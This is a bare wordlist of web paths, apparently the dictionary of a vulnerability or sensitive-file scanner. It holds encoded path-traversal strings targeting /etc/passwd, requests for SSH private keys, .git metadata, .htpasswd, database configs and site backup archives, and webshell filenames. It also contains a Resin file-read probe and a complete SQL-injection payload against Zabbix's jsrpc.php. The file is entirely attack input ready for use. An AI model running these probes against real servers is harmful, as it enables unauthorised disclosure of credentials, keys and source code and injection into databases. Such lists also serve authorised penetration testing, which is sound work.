#/1.php
#/angle.php
#/cgi-bin/test-cgi
#/phpspy.php
#/shell.php
#/spy.php
#/test-cgi
#/test.cgi
#/webshell.php
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/profile
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../../etc/profile
/../{hostname_or_folder}.ini
/.DS_Store
/.bash_history
/.bash_logout
/.bash_profile
/.bashrc
/.config.inc.php.swp
/.config.php.swp
/.database.php.swp
/.db.php.swp
/.git/HEAD
/.git/config
/.git/index
/.gitignore
/.history
/.htaccess
/.htpasswd
/.htpasswd.bak
/.idea/modules.xml
/.idea/workspace.xml
/.index.php.swp
/.mysql.php.swp
/.mysql_history
/.rediscli_history
/.settings.php.swp
/.ssh/authorized_keys
/.ssh/id_dsa
/.ssh/id_dsa.pub
/.ssh/id_rsa
/.ssh/id_rsa.pub
/.ssh/known_hosts
/.svn/entries
/.vimrc
//././././././././././././././././././././././././../../../../../../../../etc/profile
/1.php
/1.tar.gz
/INSTALL.TXT
/Jplayer.swf
/README
/WEB-INF/applicationContext-slave.xml
/WEB-INF/applicationContext.xml
/WEB-INF/classes/application.properties
/WEB-INF/classes/applicationContext.xml
/WEB-INF/classes/conf/datasource.xml
/WEB-INF/classes/conf/jdbc.properties
/WEB-INF/classes/conf/spring/applicationContext-datasource.xml
/WEB-INF/classes/config/applicationContext.xml
/WEB-INF/classes/data.xml
/WEB-INF/classes/dataBase.properties
/WEB-INF/classes/db.properties
/WEB-INF/classes/hibernate.cfg.xml
/WEB-INF/classes/jdbc.properties
/WEB-INF/classes/rabbitmq.xml
/WEB-INF/classes/security.properties
/WEB-INF/classes/spring.xml
/WEB-INF/classes/struts.xml
/WEB-INF/classes/struts_manager.xml
/WEB-INF/conf/activemq.xml
/WEB-INF/conf/database_config.properties
/WEB-INF/config.xml
/WEB-INF/config/db/dataSource.xml
/WEB-INF/config/dbconfig
/WEB-INF/database.properties
/WEB-INF/dwr.xml
/WEB-INF/log4j.properties
/WEB-INF/spring-cfg/applicationContext.xml
/WEB-INF/spring.xml
/WEB-INF/struts-config.xml
/WEB-INF/struts-front-config.xml
/WEB-INF/struts/struts-config.xml
/WEB-INF/web.properties
/WEB-INF/web.xml
/WEB-INF/web.xml.bak
/ZeroClipboard.swf
/_phpmyadmin/index.php
/a.out
/a.php
/a.tar.gz
/aa/../../cc/../../bb/../../dd/../../aa/../../cc/../../bb/../../dd/../../bb/../../dd/../../bb/../../dd/../../bb/../../dd/../../ee/../../etc/profile
/admin.do
/admin.html
/admin.jsp
/admin.php
/admin.rar
/admin.sql
/admin.tar.bz2
/admin.tar.gz
/admin.tgz
/admin.zip
/angle.php
/apc.php
/app.cfg
/app.ini
/application.ini
/application/configs/application.ini
/b.php
/back.tar.bz2
/backup.rar
/backup.sh
/backup.sql
/backup.sql.gz
/backup.tar.gz
/backup.tgz
/backup.zip
/build.tar.gz
/cacti/
/cgi-bin/test-cgi
/changelog.txt
/ckeditor/samples/
/ckeditor/samples/sample_posteddata.php
/code.tar.gz
/composer/send_email?to=orangetest@nogg&url=http://wwwwwwwwwwwww.cctvasdfasfsaasfasfs.com
/conf.ini
/conf.tar.gz
/conf/conf.zip
/conf/config.ini
/config.inc
/config.inc.php.bak
/config.ini
/config.json
/config.php
/config.php.bak
/config.tar.gz
/config/.config.php.swp
/config/config.ini
/config/config.php
/config/database.yml
/configprops
/configs/application.ini
/configuration.ini
/core
/crossdomain.xml
/data.rar
/data.sql
/data.sql.gz
/data.tar.bz2
/data.tar.gz
/data.tgz
/data.txt
/data.zip
/database.rar
/database.sql
/database.sql.gz
/database.tar.bz2
/database.tar.gz
/database.tgz
/database.yml
/database.zip
/db.conf
/db.inc
/db.ini
/db.php.bak
/db.rar
/db.sql
/db.sql.gz
/db.sqlite
/db.tar.bz2
/db.tar.gz
/db.tgz
/db.zip
/debug.php
/debug.txt
/deploy.sh
/deploy.tar.gz
/dump.sql
/dump.sql.gz
/editor/ckeditor/samples/
/editor/ckeditor/samples/sample_posteddata.php
/etc/passwd
/etc/profile
/examples/
/examples/servlets/servlet/SessionExample
/exit
/extjs/resources/charts.swf
/fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/fckeditor/_samples/default.html
/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php
/file:///etc/passwd
/flowplayer.swf
/ftp.rar
/ftp.tar.bz2
/ftp.tar.gz
/ftp.tgz
/ftp.zip
/ganglia/
/htaccess.bak
/htdocs.tar.gz
/htpasswd.bak
/httpd.conf
/i.php
/id_dsa
/id_rsa
/index.7z
/index.bak
/index.cgi.bak
/index.php.bak
/index.rar
/index.tar.bz2
/index.tar.gz
/index.tar.tz
/index.zip
/info.php
/install.sh
/install.tar.gz
/install.txt
/javax.faces.resource.../WEB-INF/web.xml.jsf
/jenkins/script
/jenkins/static/f3a41d2f/css/style.css
/jmx-console/HtmlAdaptor
/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&stamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tim%20estamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=hi%20story.php&profileIdx=web.item.graph&profileIdx2=(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20user())x%20from%20information_schema.character_sets%20group%20by%20x)y)&updateProfil%20e=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=%2017&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&%20mark_color=1
/key
/key.txt
/keys
/login.do
/login.php
/manager/html
/memadmin/index.php
/mysql.php
/nohup.out
/o.tar.gz
/old.7z
/old.rar
/old.tar.bz2
/old.tar.gz
/old.tgz
/old.zip
/open-flash-chart.swf
/output.tar.gz
/package.rar
/package.tar.bz2
/package.tar.gz
/package.tgz
/package.zip
/php.ini
/php.php
/phpMyAdmin/index.php
/phpinfo.php
/phpmyadmin/index.php
/phpspy.php
/pi.php
/pma/index.php
/proc/meminfo
/proxy.pac
/readme
/readme.html
/readme.md
/resin-admin/
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/profile
/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp
/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
/rsync.sh
/run.sh
/script
/server-status
/server.cfg
/server.xml
/settings.ini
/setup.sh
/sftp-config.json
/shell.php
/site.tar.gz
/solr/
/spy.php
/sql.7z
/sql.php
/sql.rar
/sql.tar.bz2
/sql.tar.gz
/sql.tgz
/sql.zip
/src.tar.gz
/static/f3a41d2f/css/style.css
/swfupload.swf
/swfupload/swfupload.swf
/sync.sh
/t.php
/temp.rar
/temp.tar.bz2
/temp.tar.gz
/temp.tgz
/temp.txt
/temp.zip
/test-cgi
/test.cgi
/test.html
/test.php
/test.rar
/test.sh
/test.sql
/test.tar.bz2
/test.tar.gz
/test.tgz
/test.txt
/test.zip
/test2.html
/test2.php
/test2.txt
/tmp.rar
/tmp.tar.bz2
/tmp.tar.gz
/tmp.tgz
/tmp.txt
/tmp.zip
/tools.tar.gz
/ueditor/php/getRemoteImage.php
/ueditor/ueditor.config.js
/upfile.php
/upload.do
/upload.html
/upload.jsp
/upload.php
/upload.rar
/upload.sh
/upload.tar.bz2
/upload.tar.gz
/upload.tgz
/upload.zip
/uploadify.swf
/web.config
/web.rar
/web.tar.bz2
/web.tar.gz
/web.tgz
/web.zip
/webroot.zip
/webserver.tar.gz
/webshell.php
/website.rar
/website.tar.bz2
/website.tar.gz
/website.tgz
/website.zip
/www.rar
/www.tar.bz2
/www.tar.gz
/www.tgz
/www.zip
/wwwroot.rar
/wwwroot.tar.bz2
/wwwroot.tar.gz
/wwwroot.tgz
/wwwroot.zip
/x.php
/x.tar.gz
/zabbix/
/zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tim%20estamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=hi%20story.php&profileIdx=web.item.graph&profileIdx2=(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20user())x%20from%20information_schema.character_sets%20group%20by%20x)y)&updateProfil%20e=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=%2017&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&%20mark_color=1
/zeroclipboard.swf
/{hostname_or_folder}.ini
/{sub}.sql
